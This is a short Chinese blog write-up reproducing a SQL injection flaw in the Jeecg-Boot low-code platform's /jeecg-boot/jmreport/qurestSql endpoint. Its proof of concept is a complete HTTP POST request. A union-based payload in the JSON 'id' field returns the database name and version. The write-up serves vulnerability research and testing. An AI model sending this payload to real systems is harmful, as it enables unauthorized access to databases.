热门标签
热门文章
- 1嵌入式学习之Linux_嵌入式linux
- 2Ubuntu挂载nfs文件系统报错:mount.nfs: access denied by server while mounting 198.168.1.x:/mnt/nfs_ubuntu mount.nfs: access denied by server while mo
- 3docker访问宿主机mysql_docker容器链接宿主机mysql
- 4git使用命令行推送代码_git 推送命令
- 5Jmeter连接Mysql数据库_jemter mysql connect包
- 6unity 2017介绍_介绍Unity 2017
- 7python3 批量自动下载对应用户 github上的项目 或者 starts 的项目
- 8CTF竞赛介绍以及刷题网址(非常详细)零基础入门到精通,收藏这一篇就够了_ctf竞赛官网
- 9应用系统安全管理
- 10数据结构与算法-贪心算法_用贪婪算法实现采花生问题的原理
当前位置: article > 正文
Jeecg-Boot /jeecg-boot/jmreport/qurestSql接口sql注入漏洞复现_jeecg-boot漏洞
作者:盐析白兔 | 2024-04-26 02:28:13
赞
踩
jeecg-boot漏洞
一、Jeecg-Boot介绍
JeecgBoot 是一款基于代码生成器的低代码开发平台!前后端分离架构 SpringBoot2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发! JeecgBoot 引领新的低代码开发模式(OnlineCoding-> 代码生成器-> 手工MERGE), 帮助解决Java项目70%的重复工作,让开发更多关注业务。既能快速提高效率,节省研发成本,同时又不失灵活性。
二、漏洞复现
Jeecg-Boot 的/jeecg-boot/jmreport/qurestSql接口存在sql注入漏洞,url访问 /jeecg-boot/jmreport/qurestSql出现如下页面
开启抓包工具,修改请求报文方式为POST,并修改数据包,执行查询出了目标数据库名称和数据库版本。
POC如下:
- POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
- Host: xx.xx.xx.xx:xxxx
- User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
- Accept-Encoding: gzip, deflate
- Accept: */*
- Connection: close
- Content-Type: application/json
- Content-Length: 131
-
- {"apiSelectId": "1290104038414721025", "id": "1' union all select 1,2,database(),version(),5,6,7 from rep_demo_gongsi where id='1"}
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/盐析白兔/article/detail/488446
推荐阅读
相关标签
